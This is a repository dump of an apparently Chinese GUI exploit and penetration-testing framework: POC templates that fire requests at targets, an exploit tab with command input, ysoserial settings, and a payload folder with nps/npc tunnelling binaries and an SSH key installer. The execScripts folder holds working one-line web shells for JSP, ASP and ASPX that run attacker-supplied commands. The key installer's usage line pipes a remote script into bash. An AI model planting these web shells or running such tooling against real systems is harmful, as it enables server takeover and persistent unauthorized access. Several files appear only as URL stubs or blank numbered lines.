    def {{service.entry_nodes.cvename}}(self):
        """
        Run the request described by the template header nodes against self.url + path.

        vuln == 'False' is check mode: the templated condition decides whether
        self.status becomes 'success' (no-echo success message) or fail() is
        printed. Any other vuln value prints the raw response body. Exceptions
        from the request are reported via output.error_output, not raised.
        An info table is printed at the end in both modes.
        """
        appName = '{{service.entry_nodes.vulname}}'
        pocname = '{{service.entry_nodes.cvename}}'
        path = '{{service.header_nodes.headinfo.path}}'
        method = '{{service.header_nodes.headinfo.method}}'
        desc = '{{service.entry_nodes.infoname}} {{service.entry_nodes.banner}}'
        data = '{{service.header_nodes.content.data}}'
        headers = {{service.header_nodes.headinfo.header}}
        # result printer
        output = Output(pocname)
        # request helper with retry_time/retry_interval handling
        exprequest = ExpRequest(pocname, output)
        try:
            if self.vuln == 'False':
                # verify=False: TLS certificate errors on the target are ignored
                r = exprequest.{{service.header_nodes.headinfo.method}}(self.url+path, data=data, headers=headers, retry_time=self.retry_time, retry_interval=self.retry_interval, timeout=self.timeout, verify=False)
                {{service.entry_nodes.condition}}
                    self.status = 'success'
                    output.no_echo_success(method, desc)
                else:
                    output.fail()
            else:
                result = exprequest.{{service.header_nodes.headinfo.method}}(self.url+path, data=data, headers=headers, retry_time=self.retry_time, retry_interval=self.retry_interval, timeout=self.timeout, verify=False).text
                print(result)
        except Exception as error:
            output.error_output(str(error))

        tb = pt.PrettyTable()
        tb.field_names = ['Target type', 'Vuln Name', 'Impact Version && Vulnerability description']
        tb.align['Target type'] = 'l'
        tb.align['Vuln Name'] = 'l'
        tb.align['Impact Version && Vulnerability description'] = 'l'
        tb.add_row([
            "{{service.entry_nodes.vulname}}",
            "{{service.entry_nodes.cvename}}",
            "{{service.entry_nodes.infoname}} {{service.entry_nodes.banner}}"
        ])
        print(tb)
63 |
def check(**kwargs):
    """
    Launcher entry point: run one POC method or all of them.

    kwargs['pocname'] names the method to call; it is resolved with getattr,
    so a name that is not defined on the class raises AttributeError. With
    'ALL', every non-dunder attribute of the class is invoked in dir() order
    and status is reset to 'fail' after each one.
    Returns the status string for a single POC, or a newline-joined report for 'ALL'.
    """
    result_list = []
    result_list.append('----------------------------')
    Exp{{service.entry_nodes.vulname}} = {{service.entry_nodes.vulname}}(**kwargs)
    if kwargs['pocname'] != 'ALL':
        func = getattr(Exp{{service.entry_nodes.vulname}}, kwargs['pocname'])  # bound method looked up by name
        func()
        return Exp{{service.entry_nodes.vulname}}.status
    else:  # call every method
        for func in dir({{service.entry_nodes.vulname}}):
            if not func.startswith("__"):
                methodcaller(func)(Exp{{service.entry_nodes.vulname}})
                result_list.append(func+' -> '+Exp{{service.entry_nodes.vulname}}.status)
                Exp{{service.entry_nodes.vulname}}.status = 'fail'
        result_list.append('----------------------------')
        return '\n'.join(result_list)
--------------------------------------------------------------------------------
/Template/POC.j2:
--------------------------------------------------------------------------------
1 | from ClassCongregation import color
2 |
def check(**kwargs):
    """POC template: print a header and the target url; returns None.

    The quoted block at the end is a placeholder for the return value
    convention used by batch verification (return 1 for vulnerable).
    """
    url = kwargs['url']#/*str*/
    print('输出结果', url, sep='\n')
    '''
    if True:
        return 1
    else:
        return
    '''
--------------------------------------------------------------------------------
/Template/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Template/__init__.py
--------------------------------------------------------------------------------
/data/api-docs.json:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/data/api-docs.json
--------------------------------------------------------------------------------
/data/bool_blind.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 | >
24 |
--------------------------------------------------------------------------------
/data/error.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
--------------------------------------------------------------------------------
/data/time_blind.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 | >
13 |
--------------------------------------------------------------------------------
/execScripts/Caidao_cmd.jsp:
--------------------------------------------------------------------------------
1 | <%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
--------------------------------------------------------------------------------
/execScripts/Caidao_shell.asp:
--------------------------------------------------------------------------------
1 | <%execute(request("value"))%>
--------------------------------------------------------------------------------
/execScripts/Caidao_shell.aspx:
--------------------------------------------------------------------------------
1 | <%@ Page Language="Jscript"%> <%eval(Request.Item["value"])%>
--------------------------------------------------------------------------------
/execScripts/Caidao_shell.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/img/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/img/1.png
--------------------------------------------------------------------------------
/img/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/img/2.png
--------------------------------------------------------------------------------
/lib/green.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/lib/green.png
--------------------------------------------------------------------------------
/lib/note.txt:
--------------------------------------------------------------------------------
1 | #此处存放临时数据
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 |
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 |
118 |
119 |
120 |
121 |
122 |
123 |
124 |
125 |
126 |
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 |
163 |
164 |
165 |
166 |
167 |
168 |
169 |
170 |
171 |
172 |
173 |
174 |
175 |
176 |
177 |
178 |
179 |
180 |
181 |
182 |
183 |
184 |
185 |
186 |
187 |
188 |
189 |
190 |
191 |
192 |
193 |
194 |
195 |
196 |
197 |
198 |
199 |
200 |
201 |
202 |
203 |
204 |
205 |
206 |
207 |
208 |
209 |
210 |
211 |
212 |
213 |
214 |
215 |
216 |
217 |
218 |
219 |
220 |
221 |
222 |
223 |
224 |
225 |
226 |
227 |
228 |
229 |
230 |
231 |
232 |
233 |
234 |
235 |
236 |
237 |
238 |
239 |
240 |
241 |
242 |
243 |
244 |
245 |
246 |
247 |
248 |
249 |
250 |
251 |
252 |
253 |
254 |
255 |
256 |
257 |
258 |
259 |
260 |
261 |
262 |
263 |
264 |
265 |
266 |
267 |
268 |
269 |
270 |
271 |
272 |
273 |
274 |
275 |
276 |
277 |
278 |
279 |
280 |
281 |
282 |
283 |
284 |
285 |
286 |
287 |
288 |
289 |
290 |
291 |
292 |
293 |
294 |
295 |
296 |
297 |
298 |
299 |
300 |
301 |
302 |
303 |
304 |
305 |
306 |
307 |
308 |
309 |
310 |
311 |
312 |
313 |
314 |
315 |
316 |
317 |
318 |
319 |
320 |
321 |
322 |
323 |
324 |
325 |
326 |
327 |
328 |
329 |
330 |
331 |
332 |
333 |
334 |
335 |
336 |
337 |
338 |
339 |
340 |
341 |
342 |
343 |
344 |
345 |
346 |
347 |
348 |
349 |
350 |
351 |
352 |
353 |
354 |
355 |
356 |
357 |
358 |
359 |
360 |
361 |
362 |
363 |
364 |
365 |
366 |
367 |
368 |
369 |
370 |
371 |
372 |
373 |
374 |
375 |
376 |
377 |
378 |
379 |
380 |
381 |
382 |
383 |
384 |
385 |
386 |
387 |
388 |
389 |
390 |
391 |
392 |
393 |
394 |
395 |
396 |
397 |
398 |
399 |
400 |
401 |
402 |
403 |
404 |
405 |
406 |
407 |
408 |
409 |
410 |
411 |
412 |
413 |
414 |
415 |
416 |
417 |
418 |
419 |
420 |
421 |
422 |
423 |
424 |
425 |
426 |
427 |
428 |
429 |
430 |
431 |
432 |
433 |
434 |
435 |
436 |
437 |
438 |
439 |
440 |
441 |
442 |
443 |
444 |
445 |
446 |
447 |
448 |
449 |
450 |
451 |
452 |
453 |
454 |
455 |
456 |
457 |
458 |
459 |
460 |
461 |
462 |
463 |
464 |
465 |
466 |
467 |
468 |
469 |
470 |
471 |
472 |
473 |
474 |
475 |
476 |
477 |
478 |
479 |
480 |
481 |
482 |
483 |
484 |
485 |
486 |
487 |
488 |
489 |
490 |
491 |
492 |
493 |
494 |
495 |
496 |
497 |
498 |
499 |
500 |
501 |
502 |
503 |
504 |
505 |
506 |
507 |
508 |
509 |
510 |
511 |
512 |
513 |
514 |
515 |
516 |
517 |
518 |
519 |
520 |
521 |
522 |
523 |
524 |
525 |
526 |
527 |
528 |
529 |
530 |
531 |
532 |
533 |
534 |
535 |
536 |
537 |
538 |
539 |
540 |
541 |
542 |
543 |
544 |
545 |
546 |
547 |
548 |
549 |
550 |
551 |
552 |
553 |
554 |
555 |
556 |
557 |
558 |
559 |
560 |
561 |
562 |
563 |
564 |
565 |
566 |
567 |
568 |
569 |
570 |
571 |
572 |
573 |
574 |
575 |
576 |
577 |
578 |
579 |
580 |
581 |
582 |
583 |
584 |
585 |
586 |
587 |
588 |
589 |
590 |
591 |
592 |
593 |
594 |
595 |
596 |
597 |
598 |
599 |
600 |
601 |
602 |
603 |
604 |
605 |
606 |
607 |
608 |
609 |
610 |
611 |
612 |
613 |
614 |
615 |
616 |
617 |
618 |
619 |
620 |
621 |
622 |
623 |
624 |
625 |
--------------------------------------------------------------------------------
/lib/red.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/lib/red.png
--------------------------------------------------------------------------------
/log/info.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/log/info.txt
--------------------------------------------------------------------------------
/payload_html/Ueditor/Ueditor.html:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/payload_html/Ueditor/ueditor.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/payload_html/Ueditor/ueditor.png
--------------------------------------------------------------------------------
/payload_html/chrome_payload.html:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/payload_html/key.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 | #=============================================================
3 | # https://github.com/P3TERX/SSH_Key_Installer
4 | # Description: Install SSH keys via GitHub, URL or local files
5 | # Version: 2.7
6 | # Author: P3TERX
7 | # Blog: https://p3terx.com
8 | #=============================================================
9 |
VERSION=2.7
# ANSI colour escapes used to build the status prefixes.
RED_FONT_PREFIX="\033[31m"
LIGHT_GREEN_FONT_PREFIX="\033[1;32m"
FONT_COLOR_SUFFIX="\033[0m"
INFO="[${LIGHT_GREEN_FONT_PREFIX}INFO${FONT_COLOR_SUFFIX}]"
ERROR="[${RED_FONT_PREFIX}ERROR${FONT_COLOR_SUFFIX}]"
# Non-root runs prefix privileged commands with sudo; root leaves SUDO unset.
if [ "${EUID}" != 0 ]; then
    SUDO=sudo
fi
17 |
USAGE() {
    # Print the help text; $VERSION is the script version defined at the top.
    # Unquoted heredoc: $VERSION expands, everything else is literal (as with echo "...").
    cat <<EOF

SSH Key Installer $VERSION

Usage:
bash <(curl -fsSL git.io/key.sh) [options...]

Options:
-o Overwrite mode, this option is valid at the top
-g Get the public key from GitHub, the arguments is the GitHub ID
-u Get the public key from the URL, the arguments is the URL
-f Get the public key from the local file, the arguments is the local file path
-p Change SSH port, the arguments is port number
-d Disable password login
EOF
}
33 |
# No arguments at all: show the help and stop.
if (( $# == 0 )); then
    USAGE
    exit 1
fi
38 |
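get_github_key() {
    # Resolve KEY_ID (prompting when it is empty) and fetch that account's public
    # keys from GitHub into PUB_KEY. Exits 1 on invalid input or an empty result.
    if [ -z "${KEY_ID}" ]; then
        read -e -p "Please enter the GitHub account:" KEY_ID
        [ -z "${KEY_ID}" ] && echo -e "${ERROR} Invalid input." && exit 1
    fi
    # GitHub account names are alphanumerics and hyphens; reject anything else so
    # the value cannot alter the URL path or be interpreted by the shell.
    case "${KEY_ID}" in
        *[!A-Za-z0-9-]*)
            echo -e "${ERROR} Invalid GitHub account name."
            exit 1
            ;;
    esac
    echo -e "${INFO} The GitHub account is: ${KEY_ID}"
    echo -e "${INFO} Get key from GitHub..."
    # Quoted so the ID is never word-split or globbed. With -f, curl prints nothing
    # on an HTTP error, so the empty-result check below is the one that usually fires.
    PUB_KEY=$(curl -fsSL "https://github.com/${KEY_ID}.keys")
    if [ "${PUB_KEY}" == 'Not Found' ]; then
        echo -e "${ERROR} GitHub account not found."
        exit 1
    elif [ -z "${PUB_KEY}" ]; then
        echo -e "${ERROR} This account ssh key does not exist."
        exit 1
    fi
}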
55 |
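get_url_key() {
    # Resolve KEY_URL (prompting when it is empty) and download its contents into
    # PUB_KEY. Emptiness of PUB_KEY is checked later by install_key.
    if [ -z "${KEY_URL}" ]; then
        read -e -p "Please enter the URL:" KEY_URL
        [ -z "${KEY_URL}" ] && echo -e "${ERROR} Invalid input." && exit 1
    fi
    echo -e "${INFO} Get key from URL..."
    # Quoted: an unquoted URL containing '?', '&' or spaces would be word-split/globbed.
    # NOTE: the URL is trusted as given; an https source is the only thing that stops
    # the key from being swapped in transit.
    PUB_KEY=$(curl -fsSL "${KEY_URL}")
}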
64 |
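get_loacl_key() {
    # Resolve KEY_PATH (prompting when it is empty) and read the local key file
    # into PUB_KEY. (Function name kept as spelled: the getopts dispatcher calls it.)
    if [ -z "${KEY_PATH}" ]; then
        read -e -p "Please enter the path:" KEY_PATH
        [ -z "${KEY_PATH}" ] && echo -e "${ERROR} Invalid input." && exit 1
    fi
    # Fail early with a clear message instead of relying on cat's own error output.
    if [ ! -r "${KEY_PATH}" ]; then
        echo -e "${ERROR} Cannot read key file: ${KEY_PATH}"
        exit 1
    fi
    # Bug fix: the original used $(${KEY_PATH}), which *executed* the path as a
    # command instead of printing it.
    echo -e "${INFO} Get key from ${KEY_PATH}..."
    PUB_KEY=$(cat "${KEY_PATH}")
}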
73 |
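install_key() {
    # Write PUB_KEY into ~/.ssh/authorized_keys (overwrite when OVERWRITE=1, append
    # otherwise), fix permissions, and verify the key is present. Exits 1 on failure.
    local auth_file="${HOME}/.ssh/authorized_keys"
    # -e added: without it the colour escapes inside ${ERROR} were printed literally.
    [ -z "${PUB_KEY}" ] && echo -e "${ERROR} ssh key does not exist." && exit 1
    if [ ! -f "${auth_file}" ]; then
        echo -e "${INFO} '${auth_file}' is missing..."
        echo -e "${INFO} Creating ${auth_file}..."
        mkdir -p "${HOME}/.ssh/"
        touch "${auth_file}"
        # Stop here rather than continuing to a redirect that is bound to fail.
        if [ ! -f "${auth_file}" ]; then
            echo -e "${ERROR} Failed to create SSH key file."
            exit 1
        fi
        echo -e "${INFO} Key file created, proceeding..."
    fi
    # printf instead of echo -e: the key (and its comment field) is written
    # verbatim, without backslash-escape interpretation.
    if [ "${OVERWRITE}" == 1 ]; then
        echo -e "${INFO} Overwriting SSH key..."
        printf '%s\n\n' "${PUB_KEY}" >"${auth_file}"
    else
        echo -e "${INFO} Adding SSH key..."
        printf '\n%s\n\n' "${PUB_KEY}" >>"${auth_file}"
    fi
    # sshd refuses authorized_keys unless the directory and file are private.
    chmod 700 "${HOME}/.ssh/"
    chmod 600 "${auth_file}"
    # -F: the key is a literal string, not a regex; -q: test the exit status,
    # not captured output.
    if grep -qF -- "${PUB_KEY}" "${auth_file}"; then
        echo -e "${INFO} SSH Key installed successfully!"
    else
        echo -e "${ERROR} SSH key installation failed!"
        exit 1
    fi
}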
102 |
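change_port() {
    # Set "Port ${SSH_PORT}" in sshd_config (Termux or system install) and set
    # RESTART_SSHD so the footer knows a restart is needed. Exits 1 on failure.
    # Reject anything that is not a valid TCP port before touching the config.
    case "${SSH_PORT}" in
        '' | *[!0-9]*)
            echo -e "${ERROR} Invalid SSH port: '${SSH_PORT}'"
            exit 1
            ;;
    esac
    if [ "${SSH_PORT}" -lt 1 ] || [ "${SSH_PORT}" -gt 65535 ]; then
        echo -e "${ERROR} SSH port must be between 1 and 65535."
        exit 1
    fi
    echo -e "${INFO} Changing SSH port to ${SSH_PORT} ..."
    local conf priv restart_code
    # Quoted $(uname -o): on systems without -o the old test produced a syntax error.
    if [ "$(uname -o 2>/dev/null)" == Android ]; then
        conf="$PREFIX/etc/ssh/sshd_config"
        priv=""
        restart_code=2
    else
        conf=/etc/ssh/sshd_config
        priv="$SUDO"
        restart_code=1
    fi
    # Fixes two defects of the original: the Android append wrote the coloured
    # ${INFO} prefix into sshd_config, and the Linux branch trusted sed's exit status,
    # which is 0 even when no "Port " line matched. Both paths now append when the
    # directive is absent and verify the result by reading the file back.
    if $priv grep -q "Port " "${conf}"; then
        $priv sed -i "s@.*\(Port \).*@\1${SSH_PORT}@" "${conf}"
    else
        echo "Port ${SSH_PORT}" | $priv tee -a "${conf}" >/dev/null
    fi
    if $priv grep -q "^Port ${SSH_PORT}$" "${conf}"; then
        echo -e "${INFO} SSH port changed successfully!"
        RESTART_SSHD=${restart_code}
    else
        RESTART_SSHD=0
        echo -e "${ERROR} SSH port change failed!"
        exit 1
    fi
}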
128 |
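disable_password() {
    # Set "PasswordAuthentication no" in sshd_config (Termux or system install) and
    # set RESTART_SSHD so the footer knows a restart is needed. Exits 1 on failure.
    local conf priv restart_code
    # Quoted $(uname -o): on systems without -o the old test produced a syntax error.
    if [ "$(uname -o 2>/dev/null)" == Android ]; then
        conf="$PREFIX/etc/ssh/sshd_config"
        priv=""
        restart_code=2
    else
        conf=/etc/ssh/sshd_config
        priv="$SUDO"
        restart_code=1
    fi
    # Lock-out guard: warn (but do not abort) when this user has no key installed,
    # because password logins will be refused after this change.
    if [ ! -s "${HOME}/.ssh/authorized_keys" ]; then
        echo -e "${ERROR} ${HOME}/.ssh/authorized_keys is missing or empty; make sure key login works before relying on this."
    fi
    # sed exits 0 even when nothing matched, so a missing directive used to be
    # reported as success; append it in that case and verify by reading back.
    if $priv grep -q "PasswordAuthentication " "${conf}"; then
        $priv sed -i "s@.*\(PasswordAuthentication \).*@\1no@" "${conf}"
    else
        echo "PasswordAuthentication no" | $priv tee -a "${conf}" >/dev/null
    fi
    if $priv grep -q "^PasswordAuthentication no$" "${conf}"; then
        RESTART_SSHD=${restart_code}
        echo -e "${INFO} Disabled password login in SSH."
    else
        RESTART_SSHD=0
        echo -e "${ERROR} Disable password login failed!"
        exit 1
    fi
    # NOTE(review): ChallengeResponseAuthentication / KbdInteractiveAuthentication are
    # not touched here; if PAM still offers a password prompt, those need disabling too.
}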
150 |
# Options are handled in command-line order, so -o must come before the key
# option it is meant to affect.
while getopts "og:u:f:p:d" OPT; do
    case "$OPT" in
        o) OVERWRITE=1 ;;
        g) KEY_ID=$OPTARG; get_github_key; install_key ;;
        u) KEY_URL=$OPTARG; get_url_key; install_key ;;
        f) KEY_PATH=$OPTARG; get_loacl_key; install_key ;;
        p) SSH_PORT=$OPTARG; change_port ;;
        d) disable_password ;;
        # '?' (unknown option or missing argument) and anything else share the help path.
        *) USAGE; exit 1 ;;
    esac
done
192 |
# RESTART_SSHD is set by change_port/disable_password: 1 = system sshd, 2 = Termux.
case "$RESTART_SSHD" in
    1)
        echo -e "${INFO} Restarting sshd..."
        $SUDO systemctl restart sshd && echo -e "${INFO} Done."
        ;;
    2)
        echo -e "${INFO} Restart sshd or Termux App to take effect."
        ;;
esac
199 |
--------------------------------------------------------------------------------
/payload_html/kindeditor.html:
--------------------------------------------------------------------------------
5 | Uploader
--------------------------------------------------------------------------------
/payload_html/npc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/payload_html/npc
--------------------------------------------------------------------------------
/payload_html/npc.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/payload_html/npc.exe
--------------------------------------------------------------------------------
/payload_html/nps:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/payload_html/nps
--------------------------------------------------------------------------------
/payload_html/wget.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/payload_html/wget.exe
--------------------------------------------------------------------------------
/python.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/python.ico
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | requests==2.26.0
2 | pysocks==1.7.1
3 | prettytable==2.4.0
4 | exp10it==2.7.81
5 | Crypto==1.4.1
6 | click==8.0.1
7 | pycryptodome==3.10.1
8 | jinja2==3.0.3
9 | requests_toolbelt==0.9.1
10 | openpyxl==3.0.9
11 | ajpy==0.0.5
--------------------------------------------------------------------------------
/settings.py:
--------------------------------------------------------------------------------
from tkinter import StringVar,IntVar
import os
import sys

### Project paths ###
# NOTE: every Tk variable below is created at import time without an explicit
# master, so this module must be imported only after the application's Tk root exists.
curPath = os.path.dirname(os.path.realpath(sys.executable))  # directory of the running interpreter / frozen executable
scriptPath = os.getcwd()  # working directory at import time

# Proxy source sites
Proxy_page = IntVar(value=1)  # number of proxy-list pages to crawl
Proxy_webtitle = StringVar(value='米扑代理')  # selected proxy site title (a key of Proxy_web)
Proxy_web = {
    '米扑代理' : 'freeProxy01',
    '66代理' : 'freeProxy02',
    'pzzqz' : 'freeProxy03',
    '神鸡代理' : 'freeProxy04',
    '快代理' : 'freeProxy05',
    '极速代理' : 'freeProxy06',
    '云代理' : 'freeProxy07',
    '小幻代理' : 'freeProxy08',
    '免费代理库' : 'freeProxy09',
    '89免费代理' : 'freeProxy13',
    '西拉代理' : 'freeProxy14',
}

# Proxy tab
Proxy_type = StringVar(value='HTTP/HTTPS')  # proxy tab: proxy type
Proxy_CheckVar1 = IntVar()  # proxy tab: proxy on/off checkbox (first)
Proxy_CheckVar2 = IntVar()  # proxy tab: proxy on/off checkbox (second)
Proxy_addr = StringVar(value='127.0.0.1')  # proxy tab: proxy IP
Proxy_port = StringVar(value='8080')  # proxy tab: proxy port

# Vulnerability scan tab (A)
Ent_A_Top_thread = StringVar(value='3')  # scan tab, top bar: thread count
Ent_A_Top_Text = '''[*]请输入正确的网址,比如 [http://www.baidu.com]
[*]请注意有些需要使用域名, 有些需要使用IP!
[*]漏洞扫描模块是检测漏洞的, 命令执行需要在漏洞利用模块使用!
[-]有处BUG, 在读取py文件时, 如果引号前面有字母存在会出错, 如 f'', r''
'''

# Exploit tab (B)
Ent_B_Top_url = StringVar(value='')  # exploit tab, top bar: target URL
Ent_B_Top_cookie = StringVar(value='暂时无用')  # exploit tab, top bar: Cookie (placeholder text: "unused for now")
Ent_B_Top_vulname = StringVar(value='请选择漏洞名称')  # exploit tab, top bar: vulnerability name (placeholder prompt)
Ent_B_Top_vulmethod = StringVar(value='ALL')  # exploit tab, top bar: method to invoke
Ent_B_Top_funtype = StringVar(value='False')  # exploit tab, top bar: exp feature flag
Ent_B_Top_timeout = StringVar(value='5')  # top bar: request timeout
Ent_B_Top_retry_time = StringVar(value='1')  # top bar: retry count
Ent_B_Top_retry_interval = StringVar(value='1')  # top bar: retry interval
Ent_B_Bottom_Left_cmd = StringVar()  # exploit tab, bottom: CMD input box
Ent_B_Bottom_terminal_cmd = StringVar()  # exploit tab, terminal: CMD input box

# Vulnerability test tab (C)
Ent_C_Top_url = StringVar(value='http://httpbin.org')  # test tab, top bar: target URL
Ent_C_Top_path = StringVar(value='/ip')  # test tab, top bar: request path
Ent_C_Top_reqmethod = StringVar(value='GET')  # test tab, top bar: HTTP request method
Ent_C_Top_vulname = StringVar(value='用作类名, 不能包含空格')  # test tab, top bar: script name (placeholder: used as a class name, no spaces)
Ent_C_Top_cmsname = StringVar(value='')  # test tab, top bar: CMS name
Ent_C_Top_cvename = StringVar(value='cve_')  # test tab, top bar: CVE id
Ent_C_Top_version = StringVar(value='app=\'\'')  # test tab, top bar: version info
Ent_C_Top_info = StringVar(value='命令执行描述')  # test tab, top bar: description (placeholder text)
Ent_C_Top_template = StringVar(value='请选择模板')  # test tab, top bar: template (placeholder prompt)

# Test
Ent_Cmds_Top_type = StringVar()  # command console tab, top bar: vulnerability type
Ent_Cmds_Top_typevar = StringVar(value='yy yang haha 1 2 3 4 5 7 8 0')  # command console tab, top bar: vulnerability type value (dummy default)

# Deserialization exploit tab
Ent_yso_Top_type = StringVar(value='-jar')  # ysoserial code-generation tab, top bar: type
Ent_yso_Top_class = StringVar(value='利用链类')  # ysoserial tab, top bar: gadget chain class (placeholder text)
Ent_yso_Top_cmd = StringVar(value='whoami')  # ysoserial tab, top bar: command

# TCP debug tab
TCP_Debug_IP = StringVar(value='127.0.0.1')  # TCP debug tab: IP address
TCP_Debug_PORT = IntVar(value=80)  # TCP debug tab: port
TCP_Debug_PKT_BUFF_SIZE = IntVar(value=2048)  # TCP debug tab: receive buffer size

# Other variables
# Name -> Tk variable lookup table for the proxy-related settings above.
variable_dict = {
    "Proxy_CheckVar1" : Proxy_CheckVar1,
    "Proxy_CheckVar2" : Proxy_CheckVar2,
    "PROXY_TYPE" : Proxy_type,
    "Proxy_addr" : Proxy_addr,
    "Proxy_port" : Proxy_port,
    "Proxy_page" : Proxy_page,
    "Proxy_webtitle" : Proxy_webtitle,
}
--------------------------------------------------------------------------------
/util/globalvar.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # -*- coding: utf-8 -*-
3 | """
4 | 全局变量: GlobalVar
5 | """
def _init():
    """Create (or reset) the module-level registry behind set_value/get_value."""
    # Assigning through globals() has the same effect as a ``global`` declaration
    # followed by a plain assignment.
    globals()["_global_dict"] = {}
9 |
def set_value(name, value):
    """Store *value* under *name* in the shared registry created by _init()."""
    _global_dict.update({name: value})
12 |
def get_value(name, defValue=None):
    """Return the value stored under *name*, or *defValue* when it is absent."""
    return _global_dict.get(name, defValue)
--------------------------------------------------------------------------------